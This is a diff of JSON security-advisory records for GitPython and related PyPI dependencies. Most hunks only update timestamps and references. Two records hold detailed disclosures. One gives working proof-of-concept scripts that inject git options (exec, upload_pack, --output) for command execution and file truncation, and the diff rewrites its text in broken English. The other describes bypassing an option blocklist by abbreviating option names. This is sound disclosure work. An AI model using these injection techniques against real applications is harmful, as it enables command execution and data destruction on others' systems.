"registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-21441.json b/advisories/BREW-fdroidserver-CVE-2026-21441.json index c642298810..117ef44ba3 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-21441.json +++ b/advisories/BREW-fdroidserver-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-21441", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-25645.json b/advisories/BREW-fdroidserver-CVE-2026-25645.json index c38a4eb8a4..2fd7057e74 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-25645.json +++ b/advisories/BREW-fdroidserver-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-25645", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-41066.json b/advisories/BREW-fdroidserver-CVE-2026-41066.json index 51a75024d9..aa202fa452 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-41066.json +++ b/advisories/BREW-fdroidserver-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-41066", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-41205.json b/advisories/BREW-fdroidserver-CVE-2026-41205.json index f9b9e2858a..9f69d7a2a5 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-41205.json +++ b/advisories/BREW-fdroidserver-CVE-2026-41205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-41205", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v92g-xgxw-vvmm", "CVE-2026-41205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-42215.json b/advisories/BREW-fdroidserver-CVE-2026-42215.json index 1448e40899..c9ba3e5b78 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-42215.json +++ b/advisories/BREW-fdroidserver-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-42215", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-42284.json b/advisories/BREW-fdroidserver-CVE-2026-42284.json index 0908d30b56..b2b6e8a674 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-42284.json +++ b/advisories/BREW-fdroidserver-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-42284", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44243.json b/advisories/BREW-fdroidserver-CVE-2026-44243.json index 398508bdab..2069a56da0 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44243.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44243", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44244.json b/advisories/BREW-fdroidserver-CVE-2026-44244.json index b95c967ef0..5ac6019d4c 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44244.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44244", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44307.json b/advisories/BREW-fdroidserver-CVE-2026-44307.json index bfda37b1e4..6dd7bb1314 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44307.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44307.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44307", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-2h4p-vjrc-8xpq", "CVE-2026-44307", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44405.json b/advisories/BREW-fdroidserver-CVE-2026-44405.json index f7755596b8..5a96b1ad3c 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44405.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44405", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44431.json b/advisories/BREW-fdroidserver-CVE-2026-44431.json index 2408171ebd..af6162ccb0 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44431.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44431", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44432.json b/advisories/BREW-fdroidserver-CVE-2026-44432.json index 52938fbf16..b603e721ac 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44432.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44432", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-4539.json b/advisories/BREW-fdroidserver-CVE-2026-4539.json index 728aef66d1..b37a72fa33 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-4539.json +++ b/advisories/BREW-fdroidserver-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-4539", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-45409.json b/advisories/BREW-fdroidserver-CVE-2026-45409.json index beabf7cd2b..47f60d4ace 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-45409.json +++ b/advisories/BREW-fdroidserver-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-45409", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-67322.json b/advisories/BREW-fdroidserver-CVE-2026-67322.json index 0d5d3cf6af..3ff172389b 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67322.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67322", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-67323.json b/advisories/BREW-fdroidserver-CVE-2026-67323.json index dc6449ba87..b791368447 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67323.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67323", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-67324.json b/advisories/BREW-fdroidserver-CVE-2026-67324.json index bb2a94dd6d..cdbb9b0c85 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67324.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67324", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-67325.json b/advisories/BREW-fdroidserver-CVE-2026-67325.json index a204a5bdcd..551257d14c 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-67325.json +++ b/advisories/BREW-fdroidserver-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-67325", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites 